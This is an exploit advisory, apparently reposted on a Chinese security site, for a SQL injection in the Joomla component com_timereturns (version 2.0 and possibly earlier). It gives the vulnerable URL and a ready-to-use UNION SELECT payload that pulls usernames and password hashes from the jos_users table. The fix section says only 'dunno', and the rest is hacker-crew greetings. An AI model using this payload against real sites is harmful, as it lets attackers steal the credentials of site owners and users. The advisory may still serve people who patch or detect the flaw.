Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability                     ## 

 

作者: kaMtiEz www.2cto.com            

###################################################################### 

 

  

 

[ 软件信息] 

开发者: http://www.takeaweb.it/ 

 

下载地址: http://www.takeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13 

影响版本: 2.0 or lower maybe also affected 

 

 

############################################################################################################# 

 

  

 

[缺陷文件] 

 

  

 

http://www.2cto.com /[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num] 

 

  

 

[ XpL ] 

 

  

 

http://www.2cto.com /[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- 

 

  

 

[ FIX ] 

 

  

 

dunno :"> 

 

  

 

  

 

############################################################################################################# 

 

  

 

[ Thx TO ] 

 

  

 

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9 

 

[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa 

 

[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0 

 

[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D 

 

  

 

[ NOTE ]  

 

  

 

[+] Halal Bihalal sukses mas dab :)) 

 

[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-) 

 

[+] Hellcome in MGL jos_ali_joe =)) 

 

  

 

[ QUOTE ] 

 

  

 

[+] INDONESIANCODER still r0x 

 

[+] nothing secure ..